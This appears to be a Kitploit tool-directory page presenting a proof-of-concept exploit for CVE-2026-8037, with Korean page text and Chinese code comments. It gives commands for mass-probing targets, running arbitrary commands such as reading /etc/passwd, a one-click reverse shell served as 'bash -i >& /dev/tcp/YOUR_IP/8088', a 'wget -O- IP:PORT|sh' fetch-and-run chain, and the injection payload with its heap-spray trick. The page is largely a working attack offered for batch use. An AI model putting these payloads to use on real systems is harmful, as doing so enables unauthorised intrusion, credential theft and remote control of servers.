Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-8037-POC — 실행 가능한 명령 탐지 및 원클릭 getshell 포함 (서버 배포 필요) | Kitploit
도구/GitHubGitHub/caster-chen/cve-2026-8037-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubcaster-chen/cve-2026-8037-poc

CVE-2026-8037-POC

실행 가능한 명령 탐지 및 원클릭 getshell 포함 (서버 배포 필요)

저장소 보기
32개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-8037-POC

실행 가능한 명령 탐지 및 원클릭 getshell 포함 (서버 배포 필요) pco.yaml 은 nuclei와 함께 빠르게 탐지 가능

빠른 시작

대화형 모드

root@kitploit:~
python go.py

대상 URL 입력 → 기능 메뉴 선택.

탐지 대상

root@kitploit:~
# 快速探测(8 项基本信息)
python go.py -t https://IP:PORT --probe fast

# 深度探测(全部命令:30+ 项)
python go.py -t https://IP:PORT --probe deep

# 批量探测
python go.py -f vulnerable_targets.txt --probe fast

명령 실행

root@kitploit:~
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"

# 批量并发(20 线程)
python go.py -f targets.txt -c "hostname" --batch 20

원클릭 리버스 쉘

공격기에서 두 개의 터미널 열기:

root@kitploit:~
# 终端 1 - HTTP 服务(提供 rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087

# 终端 2 - 等待反弹
nc -lvnp 8088

그런 다음 payload 전송:

root@kitploit:~
# 单目标
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088

# 批量(串行,一次只能接一个)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088

스크립트는 전송 전에 준비 단계를 출력합니다.


심층 탐지 내용


인젝션 원리

root@kitploit:~
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
 "g0":"AAAAAAAAAAAAAAAA'; <命令> #", ...}
  • apiuser="''''" 는 escape_quotes()의 null 종료 결함을 트리거합니다.
  • g0~g60 는 힙 스프레이 61회, 성공률 향상
  • '; <명령> # 컨텍스트 폐쇄, #은 후속 주석

길이 제한

echo tag 없이 34자 사용 가능:

root@kitploit:~
wget -O- IP:PORT|sh    (31 字符)

파이프 체인: wget 다운로드 → sh 실행 → bash 리버스 연결로 지정된 포트로.


매개변수 목록

도구 다운로드
카테고리명령어
기본 정보hostname, uname -a, kernel, OS release, uptime
사용자id, whoami, users/w/who
네트워크ifconfig, route, arp, listening ports, connections, iptables
시스템processes, cpuinfo, meminfo, disk, mount
파일ls / /root /tmp /home /etc
설정crontab, passwd, shadow, sudoers, SSH keys
확장config search, scripts, docker, containers
매개변수설명
-t, --target URL대상 주소
-f, --file FILE대상 목록 파일
-l, --lhost IP공격기 IP
-p, --lport PORTHTTP 서비스 포트 (기본 8087)
-n, --ncport PORTnc 리슨 포트 (기본 8088)
-c, --cmd CMD명령 실행
--probe fast/deep빠른/심층 탐지
--batch N배치 동시 실행 수 (기본 직렬)